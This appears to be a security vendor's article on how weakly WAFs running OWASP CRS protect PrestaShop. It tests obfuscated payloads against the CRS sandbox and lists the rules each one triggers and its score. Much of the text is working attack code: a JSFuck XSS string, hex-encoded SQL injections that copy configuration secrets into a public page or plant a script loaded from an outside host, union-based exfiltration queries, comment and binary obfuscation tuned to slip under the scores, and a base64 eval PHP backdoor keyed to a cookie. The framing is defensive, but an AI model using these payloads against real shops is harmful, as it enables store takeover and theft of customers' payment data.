%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D
%2B%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%21%5B%5D%2B%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29%28%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%2
1%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%29%2B%28%5B%5D%2B%5B%5D%29%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%29%
5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%29%28%29%29%22%20%22"
941100 PL1 XSS Attack Detected via libinjection
941160 PL? NoScript XSS InjectionChecker: HTML Injection
941360 PL1 JSFuck / Hieroglyphy obfuscation detected
941120 PL? XSS Filter - Category 2: Event Handler Vector
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 23)


The XSS landscape is one of the most complex and dense there is. It evolves constantly, alongside changes in the JavaScript language (ECMAScript) and its major frameworks and libraries (jQuery, Bootstrap, React, etc.). And it is not limited to category-1 and category-2 XSS.

It is obviously out of the question to list all variants (see ShadowByte1's Large_XSS_Payloads on GitHub): there are thousands of them that can achieve the same goals - namely, automatically installing a module, gaining full control over PrestaShop via a stored XSS, and then deploying a fraudulent payment module in order to steal all customers' payment card data.

The conclusion of these few demonstrations within the scope of XSS (CWE-79) is: if your WAF provider
  • operates at PL1 (Paranoia Level 1) and does not block above a score of 10 points
  • operates at PL2 (Paranoia Level 2) and does not block above a score of 20 points

You have no preventive protection against XSS injections.




2.2/ SQL injections



There are three categories of injection under CWE-89 (SQL Injection):
  • Exploration or confirmation injections, including the famous select sleep(10).
  • Tampering injections, which aim to modify your data.
  • Exfiltration injections, which aim to extract your data; PDO is vulnerable to them.

Using modern libraries has significantly reduced exposure to the first two categories of injection. However, a very widespread misconception is that these tools protect against all SQL injection attacks.

In practice, almost all systems remain vulnerable to the third category - including those built on PDO - which shows that this perception of complete protection is mistaken.



2.2.1/ SQL injections: exploration or confirmation



We assume everyone is familiar with this famous, completely harmless payload, used to verify whether a minimum level of security is in place:

?cnmq=1;select(sleep(74/3))-- -

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d 'cnmq=1%3Bselect%28sleep%2874%2F3%29%29--%20-'
942100 PL1 SQL Injection Attack Detected via libinjection
942160 PL1 Detects blind sqli tests using sleep() or benchmark()
942350 PL1 Detects MySQL UDF injection and other data/structure manipulation attempts
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)


Please note the payload's score: 15, which corresponds to three critical rules being triggered. In other words: if your WAF, configured at PL1 (paranoia level 1), doesn't block requests with scores of 15 or higher, this payload will get through without any difficulty.



2.2.2/ SQL injections: tampering



TW has published many variants to demonstrate how ineffective reactive cybersecurity mechanisms (antivirus / antimalware / FIM) can be. For example, here's one that automatically copies and pastes all secrets (including your banking tokens, which can be used to take control of your banking transactions) into a public CMS page so they can be harvested.

SET @a = X'5345542040747066203D202873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D49542031293B';PREPARE stmt FROM @a;EXECUTE stmt;SET @b = 0x534554204063203D202F2A52414E444F4D2A2F434F4E434154282755504441544520272C407470662C27636D735F6C616E672053455420636F6E74656E743D434F4E43415428636F6E74656E742C2853454C4543542047524F55505F434F4E434154282253233432222C227C222C6E616D652C227C222C76616C75652C227C22292046524F4D20272C407470662C27636F6E66696775726174696F6E29292057484552452069645F636D733D312729;PREPARE stmt2 FROM @b;EXECUTE stmt2;PREPARE stmt3 FROM @c;EXECUTE stmt3;

Let's test it against OWASP CRS:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=mod%281%2C1%29%3BSET%20%40a%20%3D%20X%275345542040747066203D202873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D49542031293B%27%3BPREPARE%20stmt%20FROM%20%40a%3BEXECUTE%20stmt%3BSET%20%40b%20%3D%200x534554204063203D202F2A52414E444F4D2A2F434F4E434154282755504441544520272C407470662C27636D735F6C616E672053455420636F6E74656E743D434F4E43415428636F6E74656E742C2853454C4543542047524F55505F434F4E434154282253233432222C227C222C6E616D652C227C222C76616C75652C227C22292046524F4D20272C407470662C27636F6E66696775726174696F6E29292057484552452069645F636D733D312729%3BPREPARE%20stmt2%20FROM%20%40b%3BEXECUTE%20stmt2%3BPREPARE%20stmt3%20FROM%20%40c%3BEXECUTE%20stmt3%3B--%20-"

This produces no result, which means that when the WAF is configured at PL1 (paranoia level 1), the payload is completely invisible and will therefore get through without any difficulty.

Let's now test it with a WAF configured at paranoia level 2 (PL2):

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=mod%281%2C1%29%3BSET%20%40a%20%3D%20X%275345542040747066203D202873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D49542031293B%27%3BPREPARE%20stmt%20FROM%20%40a%3BEXECUTE%20stmt%3BSET%20%40b%20%3D%200x534554204063203D202F2A52414E444F4D2A2F434F4E434154282755504441544520272C407470662C27636D735F6C616E672053455420636F6E74656E743D434F4E43415428636F6E74656E742C2853454C4543542047524F55505F434F4E434154282253233432222C227C222C6E616D652C227C222C76616C75652C227C22292046524F4D20272C407470662C27636F6E66696775726174696F6E29292057484552452069645F636D733D312729%3BPREPARE%20stmt2%20FROM%20%40b%3BEXECUTE%20stmt2%3BPREPARE%20stmt3%20FROM%20%40c%3BEXECUTE%20stmt3%3B--%20-"
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
942150 PL2 SQL Injection Attack: SQL function name detected
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942210 PL2 Detects chained SQL injection attempts 1/2
942380 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
942450 PL2 SQL Hex Encoding Identified
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 48)


This time, provided your WAF is configured at paranoia level 2 (PL2), we observe a much higher score: 48, corresponding to the triggering of more than nine critical rules.

Just like with XSS injections, there are thousands of variants. Criminal networks know perfectly well that the more “complete” a payload is, the higher the likelihood it will trigger a response from the cyber-defense system.

In the specific case of SQL injection, they therefore often resort to two-phased or fragmented attacks, designed to reduce the detectable fingerprint of each individual request.

Let's take as an example a variant of the SoftbyLinux data-harvesting payload - and its forks, including SoftwarebyMS - which are currently wreaking havoc across the PrestaShop ecosystem:

?cnmq=mod(74,1);/*cnmq*/UPDATE ps_configuration SET value=CONCAT(0x3c,'sc','ript s',"rc='//1j.vc/","'>",0x3c,'/','scr','ipt>') WHERE name="PS_SHOP_NAME";-- -

Please note that this is a multi-vector, two-phased payload: we embed a stored XSS payload within an SQL injection payload:
  • The SQL injection is used to inject a stored XSS payload, enabling full takeover of the shop and the deployment of a fraudulent payment module designed to exfiltrate all payment card data
  • The XSS payload is obfuscated using the CONCAT keyword and hexadecimal-style transformations
  • The anomaly score is reduced by hiding the sequence between the semicolon and the UPDATE keyword using C-style comments

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/"  -d 'cnmq=mod%2874%2C1%29%3B%2F%2Acnmq%2A%2FUPDATE%20ps_configuration%20SET%20value%3DCONCAT%280x3c%2C%27sc%27%2C%27ript%20s%27%2C%22rc%3D%27%2F%2F1j.vc%2F%22%2C%22%27%3E%22%2C0x3c%2C%27%2F%27%2C%27scr%27%2C%27ipt%3E%27%29%20WHERE%20name%3D%22PS_SHOP_NAME%22%3B--%20-'
942151 PL1 SQL Injection Attack: SQL function name detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)


Please note the payload's score: 5, which corresponds to a single critical rule being triggered. In other words: if your WAF, configured at PL1 (paranoia level 1), doesn't block requests with scores of 5 or higher, this payload will get through without any difficulty.

Now let's look at paranoia level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/"  -d 'cnmq=mod%2874%2C1%29%3B%2F%2Acnmq%2A%2FUPDATE%20ps_configuration%20SET%20value%3DCONCAT%280x3c%2C%27sc%27%2C%27ript%20s%27%2C%22rc%3D%27%2F%2F1j.vc%2F%22%2C%22%27%3E%22%2C0x3c%2C%27%2F%27%2C%27scr%27%2C%27ipt%3E%27%29%20WHERE%20name%3D%22PS_SHOP_NAME%22%3B--%20-'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941330 PL2 IE XSS Filters - Attack Detected
941340 PL2 IE XSS Filters - Attack Detected
942151 PL1 SQL Injection Attack: SQL function name detected
942131 PL2 SQL Injection Attack: SQL Boolean-based attack detected
942150 PL2 SQL Injection Attack: SQL function name detected
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942410 PL2 SQL Injection Attack
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 73)


This time, provided your WAF is configured at paranoia level 2, we observe a much higher score: 73, corresponding to the triggering of more than fourteen critical rules.

Criminal networks know exactly how to reverse-engineer the security rules triggered by these payloads. They also know that some rules are never enabled due to linguistic incompatibilities - French being a particularly difficult language to protect, notably because apostrophes are so commonly used.

Here is an example of a payload for which the anomaly score is deliberately minimized:

?cnmq=mod/*cnmq*/(1,1);/*cnmq*/UPDATE/*cnmq*/ps_configuration SET value=b'001111000111001101100011011100100110100101110000011101000010000001110011001100010111001001100011001111010010011100101111001011110011000101101010001011100111011001100011001011110010011100111110001111000010111101110011011000110111001001101001011100000111010000111110' WHERE name/*cnmq*/LIKE "PS_SHOP_NAME";-- -

Please note:
  • The main payload is obfuscated in binary.
  • Several C-style comments are added to deceive the regular expressions of the security rules.

Let's now look at the result on the OWASP CRS side, with a WAF configured at paranoia level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/"  -d 'cnmq=mod%2F%2Acnmq%2A%2F%281%2C1%29%3B%2F%2Acnmq%2A%2FUPDATE%2F%2Acnmq%2A%2F%20ps_configuration%20SET%20value%3Db%27001111000111001101100011011100100110100101110000011101000010000001110011001100010111001001100011001111010010011100101111001011110011000101101010001011100111011001100011001011110010011100111110001111000010111101110011011000110111001001101001011100000111010000111110%27%20WHERE%20name%2F%2Acnmq%2A%2FLIKE%20%22PS_SHOP_NAME%22%3B--%20-'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 28)


Provided your WAF is configured at paranoia level 2, we observe a score that is twice as low: 28. However, there's a little secret, one that is rarely acknowledged.

The rule 932200 is difficult to keep enabled, because it triggers on parameters that contain links - or harmless fragments of links - and criminal networks know this perfectly well. As a result, the score actually observed on the vast majority of WAFs will be 28 minus the 10 points associated with rule 932200, i.e. an effective score of 18, not 28.

In other words, this payload will get through any WAF configured at PL2 (paranoia level 2) that does not block requests with scores of 18 or higher.



2.2.3/ SQL injections: union-based exfiltration



Mistakenly, many developers believe they are protected against SQL exfiltration. In reality, almost all database engines remain vulnerable - for a simple reason: by design, it's nearly impossible to fully neutralize this kind of attack. Legitimate uses are numerous, fundamental, and inseparable from the SQL language itself.

We won't dwell on the exploitation process for this type of injection; it is often two-phased, since it requires determining beforehand the custom table prefix of the targeted database.

An often-overlooked technical point - especially among developers who aren't database administrators - is that the information_schema database contains a large amount of exploitable information.

Even though it is generally difficult - sometimes even impossible - to fully exploit its contents through tools such as phpMyAdmin or Adminer, which restrict this type of SQL query, that information remains fully accessible through your favorite PHP libraries, especially PDO.

If you want to test these injections yourself, do it using a custom PHP script; they won't work with most web-based database administration interfaces, including phpMyAdmin.

To help you clearly understand why we recommend changing the table prefix, we're going to look at two exfiltration queries, one of which is unavoidable when the prefix isn't the platform's default (ps_ for PrestaShop, wp_ for WordPress, etc.).

Here is a first injection that makes it possible to exfiltrate the database prefix; the employee table is targeted because it is always present in PrestaShop:

?cnmq=1 UNION SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_NAME LIKE "%employee"-- -

Let's look at the result on the CRS side:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/"  -d 'cnmq=mod%281%2C1%29%20UNION%20SELECT%20TABLE_NAME%20FROM%20information_schema.TABLES%20WHERE%20TABLE_NAME%20LIKE%20%22%25employee%22--%20-'
942140 PL1 SQL Injection Attack: Common DB Names Detected
942190 PL1 Detects MSSQL code execution and information gathering attempts
942270 PL1 Looking for basic sql injection. Common attack string for mysql, oracle and others
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)


Please note the payload score: 15, which corresponds to the triggering of three critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 15, this payload will get through without difficulty.

Now let's look at PL2 (Paranoia Level 2):

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/"  -d 'cnmq=mod%281%2C1%29%20UNION%20SELECT%20TABLE_NAME%20FROM%20information_schema.TABLES%20WHERE%20TABLE_NAME%20LIKE%20%22%25employee%22--%20-'
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
942140 PL1 SQL Injection Attack: Common DB Names Detected
942190 PL1 Detects MSSQL code execution and information gathering attempts
942270 PL1 Looking for basic sql injection. Common attack string for mysql, oracle and others
942150 PL2 SQL Injection Attack: SQL function name detected
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
942330 PL2 Detects classic SQL injection probings 1/3
942410 PL2 SQL Injection Attack
942480 PL2 SQL Injection Attack
942440 PL2 SQL Comment Sequence Detected
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 65)


This time, we can see that four times as many rules were triggered: the payload score rises to 65, i.e., thirteen critical rules. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 65, this payload will get through without difficulty.

Fortunately, many rules exist in PL2 for UNION clauses, which makes these attacks “noisy” (i.e., they generate a high score), especially when the information_schema table is explicitly referenced. We have no offensive use cases below 55 points, even when using hexadecimal and/or C-style comments, since no transformation can be applied to elements such as the database name or table name in this context - unless proven otherwise.

However, if the table prefix is known, and therefore there is no need to first exfiltrate information from the information_schema database, the scoring picture changes:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/"  -d 'cnmq=mod%2F%2Acnmq%2A%2F%281%2C1%29%20UNION%2F%2Avxgbodebqnjotvycdypbeppxjymmnigqvpqgwicmadnnehqcwpjobvioqtjngcdgopbgngjwhnhceagdhcijhbpwgjbdqiwjwtyty%2A%2FSELECT%20CONCAT%2F%2Acnmq%2A%2F%28name%2C0x2d%2Cvalue%29%20FROM%2F%2Acnmq%2A%2Fps_configuration--%20-'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
942190 PL1 Detects MSSQL code execution and information gathering attempts
942270 PL1 Looking for basic sql injection. Common attack string for mysql, oracle and others
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 33)


Same point as before: since rule 932200 was triggered twice, we need to subtract it from the score, just like 942430, which is only very rarely activated given its complexity. The final observed score will therefore be 20 points.

We know that many of you refuse to tune rule 942440. We'd like to remind you that, in the current CRS, it is a critical rule against bypass techniques such as C-style comment evasion. We therefore refuse to subtract it from the score, even though we arguably should, given the current state of the WAF configurations we've observed.

We hope that, after reviewing these payloads and their scores, you'll understand that when your DevSecOps team advises you to change your table prefix, it's by no means overzealous - it has concrete, real-world impacts on the project's security.

The conclusion from these few demonstrations within the scope of SQL injection (CWE-89) is: if your WAF provider
  • operates at PL1 (paranoia level 1)
  • operates at PL2 (paranoia level 2) and does not block anything above a 15-point score

You have no preventive protection against SQL injection.




2.3/ PHP injections



We assume everyone is familiar with this harmless payload, used to verify whether at least a minimal level of protection against PHP injection (CWE-94) is in place:

?cnmq=<?php sleep(74/5);

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%3C%3Fphp%20sleep%2874%2F5%29%3B"
933100 PL1 PHP Injection Attack: PHP Open Tag Found
942160 PL1 Detects blind sqli tests using sleep() or benchmark()
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.

This variant is less well known: it uses what are called “short echo tags”, which - unlike PHP short tags - can no longer be disabled as of PHP 5.3.

?cnmq=<?=74;echo md5(74);

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%3C%3F%3D74%3Becho%20md5%2874%29%3B"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
942151 PL1 SQL Injection Attack: SQL function name detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 20)


Please note the payload score: 20, which corresponds to the triggering of four critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 20, this payload will get through without difficulty.

The point is the same as for SQL injection (CWE-89) and XSS injection (CWE-79): thousands of variations exist. Nevertheless, the common denominator often associated with this class of vulnerability is the ability to add backdoors to the targeted PrestaShop site.

Here is an offensive payload that makes it possible to achieve this:

?cnmq=<?=1;eval/*cnmq*/('?><?php '.eval/*cnmq*/('return base64'.'_decode(eval/*cnmq*/(base64'.'_'.'dec'.'ode'.'("cmV0dXJuIEBvcGVuc3NsX2RlY3J5cHQoQGd6dW5jb21wcmVzcyhAYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsnX3BrX3JlZmNubXEnXSkpLCAnYWVzLTI1Ni1jYmMnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10sIE9QRU5TU0xfUkFXX0RBVEEsIHN1YnN0cihoYXNoKCdzaGEyNTYnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10pLCAwLCAxNikp")));'));

Please note:
  • The main payload is obfuscated in Base64.
  • The base64_decode keywords are split and then concatenated to reduce the anomaly score.
  • C-style comments are used to fool regular expressions.
  • It exploits historical weaknesses in WAF handling of Matomo cookies (_pk_ref), while relying on an RSA-encrypted exchange to neutralize after-the-fact protection mechanisms.

